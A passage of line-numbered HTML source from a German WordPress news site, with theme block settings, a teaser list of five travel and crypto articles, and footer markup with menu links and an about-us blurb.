0","excl_show":"","offset":"1","date_txt":"#000000","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","post_ids":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","sort":"","linked_posts":"","favourite_only":"","locked_only":"","limit":"5","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","container_width":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_":"","meta_info_align":"","meta_info_horiz":"layout-default","meta_width":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_style":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category":"","modules_category_radius":"0","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","review_space":"","review_size":"2.5","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","show_audio":"block","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_padding":"","pag_border_radius":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_transform":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_font_transform":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_weight":"","f_btn_font_transform":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_bg":"","btn_bg_hover":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_border":"","pag_h_border":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_205","tdc_css_class":"tdi_205","tdc_css_class_style":"tdi_205_rand_style"}';
  2495. block_tdi_205.td_column_number = "1";
  2496. block_tdi_205.block_type = "td_flex_block_1";
  2497. block_tdi_205.post_count = "5";
  2498. block_tdi_205.found_posts = "3784";
  2499. block_tdi_205.header_color = "";
  2500. block_tdi_205.ajax_pagination_infinite_stop = "";
  2501. block_tdi_205.max_num_pages = "757";
  2502. tdBlocksArray.push(block_tdi_205);
  2503. </script><div class="td-block-title-wrap"></div><div id=tdi_205 class="td_block_inner td-mc1-wrap">
  2504.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2505.            <div class="td-module-container td-category-pos-">
  2506.                                    <div class="td-image-container">
  2507.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/" rel="bookmark" class="td-image-wrap " title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt."><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Die-letzten-Jahre-waren-fuer-Krypto-Investoren-und-Krypto-Boersenbesitzer-ein-wilder-Ritt.jpg"  ></span></a></div>                                                                    </div>
  2508.                
  2509.                <div class="td-module-meta-info">
  2510.                                        
  2511.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/" rel="bookmark" title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.">Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.</a></h3>
  2512.                    
  2513.                                            <div class="td-editor-date">
  2514.                                                        <a href="https://nachrichtenmorgen.de/category/krypto/" class="td-post-category">Krypto</a>
  2515.                                                            <span class="td-author-date">
  2516.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-04T15:49:51+02:00" >Mai 4, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/#respond">0</a></span>                                </span>
  2517.                                                    </div>
  2518.                    
  2519.                    <div class="td-excerpt">5 Krypto-Trends, denen man im Jahr 2024 und darüber...</div>
  2520.                    
  2521.                                    </div>
  2522.            </div>
  2523.        </div>
  2524.  
  2525.        
  2526.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2527.            <div class="td-module-container td-category-pos-">
  2528.                                    <div class="td-image-container">
  2529.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/" rel="bookmark" class="td-image-wrap " title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-10-696x391.jpg"  ></span></a></div>                                                                    </div>
  2530.                
  2531.                <div class="td-module-meta-info">
  2532.                                        
  2533.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/" rel="bookmark" title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste">Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste</a></h3>
  2534.                    
  2535.                                            <div class="td-editor-date">
  2536.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  2537.                                                            <span class="td-author-date">
  2538.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T10:51:42+02:00" >Mai 2, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/#respond">0</a></span>                                </span>
  2539.                                                    </div>
  2540.                    
  2541.                    <div class="td-excerpt">Carmel-by-the-Sea, oft einfach als Carmel bekannt, ist ein malerisches...</div>
  2542.                    
  2543.                                    </div>
  2544.            </div>
  2545.        </div>
  2546.  
  2547.        
  2548.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2549.            <div class="td-module-container td-category-pos-">
  2550.                                    <div class="td-image-container">
  2551.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/" rel="bookmark" class="td-image-wrap " title="Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-1-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  2552.                
  2553.                <div class="td-module-meta-info">
  2554.                                        
  2555.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/" rel="bookmark" title="Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung">Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung</a></h3>
  2556.                    
  2557.                                            <div class="td-editor-date">
  2558.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  2559.                                                            <span class="td-author-date">
  2560.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T09:51:40+02:00" >Mai 2, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/#respond">0</a></span>                                </span>
  2561.                                                    </div>
  2562.                    
  2563.                    <div class="td-excerpt">Ein Roadtrip durch die USA mit dem Mietwagen –...</div>
  2564.                    
  2565.                                    </div>
  2566.            </div>
  2567.        </div>
  2568.  
  2569.        
  2570.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2571.            <div class="td-module-container td-category-pos-">
  2572.                                    <div class="td-image-container">
  2573.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/" rel="bookmark" class="td-image-wrap " title="Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-7-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  2574.                
  2575.                <div class="td-module-meta-info">
  2576.                                        
  2577.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/" rel="bookmark" title="Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer">Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer</a></h3>
  2578.                    
  2579.                                            <div class="td-editor-date">
  2580.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  2581.                                                            <span class="td-author-date">
  2582.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T08:51:38+02:00" >Mai 2, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/#respond">0</a></span>                                </span>
  2583.                                                    </div>
  2584.                    
  2585.                    <div class="td-excerpt">Kalifornien, der Sonnenstaat der USA, ist ein Mekka für...</div>
  2586.                    
  2587.                                    </div>
  2588.            </div>
  2589.        </div>
  2590.  
  2591.        
  2592.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2593.            <div class="td-module-container td-category-pos-">
  2594.                                    <div class="td-image-container">
  2595.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/hotels-in-las-vegas/" rel="bookmark" class="td-image-wrap " title="Die besten Hotels in Las Vegas: Eine umfassende Anleitung"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-8-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  2596.                
  2597.                <div class="td-module-meta-info">
  2598.                                        
  2599.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/hotels-in-las-vegas/" rel="bookmark" title="Die besten Hotels in Las Vegas: Eine umfassende Anleitung">Die besten Hotels in Las Vegas: Eine umfassende Anleitung</a></h3>
  2600.                    
  2601.                                            <div class="td-editor-date">
  2602.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  2603.                                                            <span class="td-author-date">
  2604.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T07:52:08+02:00" >Mai 2, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/hotels-in-las-vegas/#respond">0</a></span>                                </span>
  2605.                                                    </div>
  2606.                    
  2607.                    <div class="td-excerpt">Las Vegas, bekannt für seine glitzernden Lichter, erstklassigen Unterhaltungsmöglichkeiten...</div>
  2608.                    
  2609.                                    </div>
  2610.            </div>
  2611.        </div>
  2612.  
  2613.        </div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" aria-label="prev-page" id="prev-page-tdi_205" data-td_block_id="tdi_205"><i class="td-next-prev-icon tdc-font-tdmp tdc-font-tdmp-arrow-left"></i></a><a href="#"  class="td-ajax-next-page" aria-label="next-page" id="next-page-tdi_205" data-td_block_id="tdi_205"><i class="td-next-prev-icon tdc-font-tdmp tdc-font-tdmp-arrow-right"></i></a></div></div></div></div></div></div></div></div></div></div></div></div>                </div>
  2614.                            </div> <!-- /.td-main-content-wrap -->
  2615.  
  2616.  
  2617.            
  2618.  
  2619.    <div class="td-footer-template-wrap" style="position: relative">
  2620.                <div class="td-footer-wrap ">
  2621.            <div id="tdi_206" class="tdc-zone"><div class="tdc_zone tdi_207  wpb_row td-pb-row tdc-element-style"  >
  2622. <style scoped>.tdi_207{min-height:0}.tdi_207>.td-element-style:after{content:''!important;width:100%!important;height:100%!important;position:absolute!important;top:0!important;left:0!important;z-index:0!important;display:block!important;background-color:#eaeaea!important}</style>
  2623. <div class="tdi_206_rand_style td-element-style" ></div><div id="tdi_208" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_209  wpb_row td-pb-row" >
  2624. <style scoped>.tdi_209,.tdi_209 .tdc-columns{min-height:0}.tdi_209,.tdi_209 .tdc-columns{display:block}.tdi_209 .tdc-columns{width:100%}.tdi_209{padding-top:30px!important}.tdi_209 .td_block_wrap{text-align:left}</style><div class="vc_column tdi_211  wpb_column vc_column_container tdc-column td-pb-span12">
  2625. <style scoped>.tdi_211{vertical-align:baseline}.tdi_211>.wpb_wrapper,.tdi_211>.wpb_wrapper>.tdc-elements{display:block}.tdi_211>.wpb_wrapper>.tdc-elements{width:100%}.tdi_211>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_211>.wpb_wrapper{width:auto;height:auto}</style><div class="wpb_wrapper" ><div class="vc_row_inner tdi_213  vc_row vc_inner wpb_row td-pb-row" >
  2626. <style scoped>.tdi_213{position:relative!important;top:0;transform:none;-webkit-transform:none}.tdi_213,.tdi_213 .tdc-inner-columns{display:block}.tdi_213 .tdc-inner-columns{width:100%}.tdi_213{margin-right:0px!important;margin-bottom:30px!important;margin-left:0px!important;border-color:#000000!important;border-style:solid!important;border-width:0px 0px 3px 0px!important}.tdi_213 .td_block_wrap{text-align:left}@media (min-width:1019px) and (max-width:1140px){.tdi_213{margin-bottom:25px!important}}@media (max-width:767px){.tdi_213{margin-bottom:25px!important;padding-bottom:10px!important;width:100%!important}}@media (min-width:768px) and (max-width:1018px){.tdi_213{margin-bottom:20px!important}}</style><div class="vc_column_inner tdi_215  wpb_column vc_column_container tdc-inner-column td-pb-span3">
  2627. <style scoped>.tdi_215{vertical-align:baseline}.tdi_215 .vc_column-inner>.wpb_wrapper,.tdi_215 .vc_column-inner>.wpb_wrapper .tdc-elements{display:block}.tdi_215 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}@media (max-width:767px){.tdi_215{margin-bottom:15px!important;justify-content:center!important;text-align:center!important}}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="td_block_wrap tdb_header_logo tdi_216 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_216" >
  2628. <style>.tdi_216{margin-left:-20px!important;z-index:0!important}@media (min-width:768px) and (max-width:1018px){.tdi_216{margin-left:-15px!important}}@media (max-width:767px){.tdi_216{margin-left:0px!important;display:inline-block!important}}</style>
  2629. <style>.tdi_216 .tdb-logo-a,.tdi_216 h1{flex-direction:row}.tdi_216 .tdb-logo-a,.tdi_216 h1{align-items:flex-start;justify-content:flex-start}.tdi_216 .tdb-logo-svg-wrap{display:block}.tdi_216 .tdb-logo-img-wrap{display:none}.tdi_216 .tdb-logo-text-tagline{margin-top:0;margin-left:0px;color:#000000;font-family:Work Sans!important;font-size:10px!important;line-height:2!important;font-style:italic!important;font-weight:500!important;}.tdi_216 .tdb-logo-text-wrap{flex-direction:row;align-items:baseline;align-items:flex-start}.tdi_216 .tdb-logo-icon{top:0px;display:none}.tdi_216 .tdb-logo-text-title{color:#dd3333;font-family:PT Serif!important;font-size:42px!important;line-height:1.2!important;font-style:normal!important;font-weight:700!important;letter-spacing:-2px!important;}@media (min-width:1019px) and (max-width:1140px){.tdi_216 .tdb-logo-img{max-width:260px}.tdi_216 .tdb-logo-text-title{font-size:36px!important;letter-spacing:-3px!important;}.tdi_216 .tdb-logo-text-tagline{letter-spacing:0.5px!important;}}@media (min-width:768px) and (max-width:1018px){.tdi_216 .tdb-logo-img{max-width:180px}.tdi_216 .tdb-logo-icon{top:3px}.tdi_216 .tdb-logo-text-title{font-size:30px!important;letter-spacing:-1.5px!important;}.tdi_216 .tdb-logo-text-tagline{line-height:1.8!important;}}</style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://nachrichtenmorgen.de/"><h1><span class="tdb-logo-text-wrap"><span class="tdb-logo-text-title">Nachrichten Morgen</span><span class="tdb-logo-text-tagline"> </span></span></h1></a></div></div> <!-- ./block --></div></div></div><div class="vc_column_inner tdi_218  wpb_column vc_column_container tdc-inner-column td-pb-span9">
  2630. <style scoped>.tdi_218{vertical-align:baseline}.tdi_218 .vc_column-inner>.wpb_wrapper,.tdi_218 .vc_column-inner>.wpb_wrapper .tdc-elements{display:block}.tdi_218 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="td_block_wrap td_block_list_menu tdi_219 td-blm-display-horizontal td-pb-border-top td_block_template_1 widget"  data-td-block-uid="tdi_219" >
  2631. <style>.tdi_219{margin-right:-20px!important;margin-bottom:0px!important}@media (max-width:767px){.tdi_219{margin-right:0px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_219{margin-right:-15px!important}}</style>
  2632. <style>body .tdi_219 ul{text-align:right;justify-content:flex-end}body .tdi_219 ul li a{justify-content:flex-end}body .tdi_219 .td-blm-menu-item-txt{flex-grow:unset}body .tdi_219 ul{margin:20px}body .tdi_219 ul li{margin-right:30px}body .tdi_219 ul li:last-child{margin-right:0}body .tdi_219 a,body .tdi_219 .td-blm-sub-icon{color:#000000}body .tdi_219 li.current-menu-item>a,body .tdi_219 li.current-menu-ancestor>a,body .tdi_219 li.current-category-ancestor>a,body .tdi_219 li.current-page-ancestor>a,body .tdi_219 a:hover,body .tdi_219 li.current-menu-item>a>.td-blm-sub-icon,body .tdi_219 li.current-menu-ancestor>a>.td-blm-sub-icon,body .tdi_219 li.current-category-ancestor>a>.td-blm-sub-icon,body .tdi_219 li.current-page-ancestor>a>.td-blm-sub-icon,body .tdi_219 a:hover>.td-blm-sub-icon{color:#ec3535}body .tdi_219 li{font-family:Work Sans!important;font-size:14px!important;line-height:1.2!important;font-weight:600!important}@media (min-width:1019px) and (max-width:1140px){body .tdi_219 ul li{margin-right:25px}body .tdi_219 ul li:last-child{margin-right:0}body .tdi_219 li{font-size:13px!important}}@media (min-width:768px) and (max-width:1018px){body .tdi_219 ul{margin:15px}body .tdi_219 ul li{margin-right:15px}body .tdi_219 ul li:last-child{margin-right:0}body .tdi_219 li{font-size:12px!important}}@media (max-width:767px){body .tdi_219 ul{text-align:center;justify-content:center}body .tdi_219 ul li a{justify-content:center}body .tdi_219 .td-blm-menu-item-txt{flex-grow:unset}body .tdi_219 ul{margin:0px}body .tdi_219 ul li{margin-right:15px}body .tdi_219 ul li:last-child{margin-right:0}body .tdi_219 li{font-size:13px!important;line-height:1.6!important}}</style><div class="td-block-title-wrap"></div><div id=tdi_219 class="td_block_inner td-fix-index"><div class="menu-td-demo-footer-menu-container"><ul id="menu-td-demo-footer-menu-1" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-1092"><a href="https://nachrichtenmorgen.de/ueber-uns/"><span class="td-blm-menu-item-txt">Über uns!</span></a></li>
  2633. <li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-1093"><a href="https://nachrichtenmorgen.de/kontakt/"><span class="td-blm-menu-item-txt">Kontakt</span></a></li>
  2634. <li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-1094"><a href="https://nachrichtenmorgen.de/datenschutzbestimmungen/"><span class="td-blm-menu-item-txt">Datenschutzbestimmungen</span></a></li>
  2635. <li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-3265"><a href="https://nachrichtenmorgen.de/impressum/"><span class="td-blm-menu-item-txt">Impressum</span></a></li>
  2636. </ul></div></div></div></div></div></div></div><div class="vc_row_inner tdi_221  vc_row vc_inner wpb_row td-pb-row" >
  2637. <style scoped>.tdi_221{position:relative!important;top:0;transform:none;-webkit-transform:none}.tdi_221,.tdi_221 .tdc-inner-columns{display:block}.tdi_221 .tdc-inner-columns{width:100%}.tdi_221{margin-bottom:40px!important}.tdi_221 .td_block_wrap{text-align:left}</style><div class="vc_column_inner tdi_223  wpb_column vc_column_container tdc-inner-column td-pb-span3">
  2638. <style scoped>.tdi_223{vertical-align:baseline}.tdi_223 .vc_column-inner>.wpb_wrapper,.tdi_223 .vc_column-inner>.wpb_wrapper .tdc-elements{display:block}.tdi_223 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}.tdi_223{width:27%!important}@media (max-width:767px){.tdi_223{margin-bottom:25px!important;width:100%!important}}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_column_title tdi_224 tdm-content-horiz-left td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_224" ><div class="td-block-row"><div class="td-block-span12 tdm-col">
  2639. <style>body .tdi_225 .tdm-title{color:#000000}.tdi_225 .tdm-title{font-family:Work Sans!important;font-size:24px!important;line-height:1!important;font-weight:700!important;letter-spacing:-1px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_225 .tdm-title{font-size:22px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_225 .tdm-title{font-size:20px!important}}</style><div class="tds-title tds-title1 td-fix-index tdi_225 "><h3 class="tdm-title tdm-title-sm">Über uns</h3></div></div></div></div><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_226 td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_226" >
  2640. <style>.tdi_226{margin-bottom:25px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_226{margin-bottom:20px!important}}@media (max-width:767px){.tdi_226{margin-bottom:20px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_226{margin-bottom:15px!important}}</style>
  2641. <style>.tdi_226{text-align:left!important}.tdi_226 .tdm-descr{color:#000000;font-family:PT Serif!important;font-size:15px!important;line-height:1.5!important;font-weight:400!important}.tdi_226 .tdm-descr a{color:#ec3535}.tdi_226 .tdm-descr a:hover{color:#c11f1f}@media (min-width:1019px) and (max-width:1140px){.tdi_226 .tdm-descr{font-size:14px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_226 .tdm-descr{font-size:13px!important}}</style><p class="tdm-descr">NachrichtenMorgen.de ist eine professionelle Nachrichtenplattform. Hier stellen wir Ihnen nur interessante Inhalte zur Verfügung, die Ihnen sehr gefallen werden. Wir sind bestrebt, Ihnen die besten Nachrichten zu liefern, wobei der Schwerpunkt auf Zuverlässigkeit und den neuesten Nachrichten in Deutschland liegt.</p></div><div class="tdm_block td_block_wrap tdm_block_socials tdi_227 tdm-content-horiz-left td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_227" >
  2642. <style></style>
  2643. <style>.tdi_228 .tdm-social-item i{font-size:14px;vertical-align:middle}.tdi_228 .tdm-social-item i.td-icon-linkedin,.tdi_228 .tdm-social-item i.td-icon-pinterest,.tdi_228 .tdm-social-item i.td-icon-blogger,.tdi_228 .tdm-social-item i.td-icon-vimeo{font-size:11.2px}.tdi_228 .tdm-social-item{width:35px;height:35px;margin:5px 10px 5px 0}.tdi_228 .tdm-social-item i{line-height:35px}.tdi_228 .tdm-social-item-wrap:last-child .tdm-social-item{margin-right:0!important}.tdi_228 .tdm-social-text{display:none;margin-left:2px;margin-right:18px}</style><div class="tdm-social-wrapper tds-social1 tdi_228"><div class="tdm-social-item-wrap"><a href="#"  title="Facebook" class="tdm-social-item"><i class="td-icon-font td-icon-facebook"></i><span style="display: none">Facebook</span></a></div><div class="tdm-social-item-wrap"><a href="#"  title="Instagram" class="tdm-social-item"><i class="td-icon-font td-icon-instagram"></i><span style="display: none">Instagram</span></a></div><div class="tdm-social-item-wrap"><a href="#"  title="Twitter" class="tdm-social-item"><i class="td-icon-font td-icon-twitter"></i><span style="display: none">Twitter</span></a></div></div></div></div></div></div><div class="vc_column_inner tdi_230  wpb_column vc_column_container tdc-inner-column td-pb-span3">
  2644. <style scoped>.tdi_230{vertical-align:baseline}.tdi_230 .vc_column-inner>.wpb_wrapper,.tdi_230 .vc_column-inner>.wpb_wrapper .tdc-elements{display:block}.tdi_230 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}.tdi_230{width:17%!important;justify-content:flex-end!important;text-align:right!important}@media (max-width:767px){.tdi_230{margin-bottom:25px!important;width:100%!important}}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_column_title tdi_231 tdm-content-horiz-left td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_231" ><div class="td-block-row"><div class="td-block-span12 tdm-col">
  2645. <style>body .tdi_232 .tdm-title{color:#000000}.tdi_232 .tdm-title{font-family:Work Sans!important;font-size:24px!important;line-height:1!important;font-weight:700!important;letter-spacing:-1px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_232 .tdm-title{font-size:22px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_232 .tdm-title{font-size:20px!important}}</style><div class="tds-title tds-title1 td-fix-index tdi_232 "><h3 class="tdm-title tdm-title-sm">Unternehmen</h3></div></div></div></div><div class="td_block_wrap td_block_list_menu tdi_233 td-blm-display-vertical td-pb-border-top td_block_template_1 widget"  data-td-block-uid="tdi_233" >
  2646. <style>.tdi_233{margin-bottom:0px!important}@media (max-width:767px){.tdi_233{margin-right:0px!important}}</style>
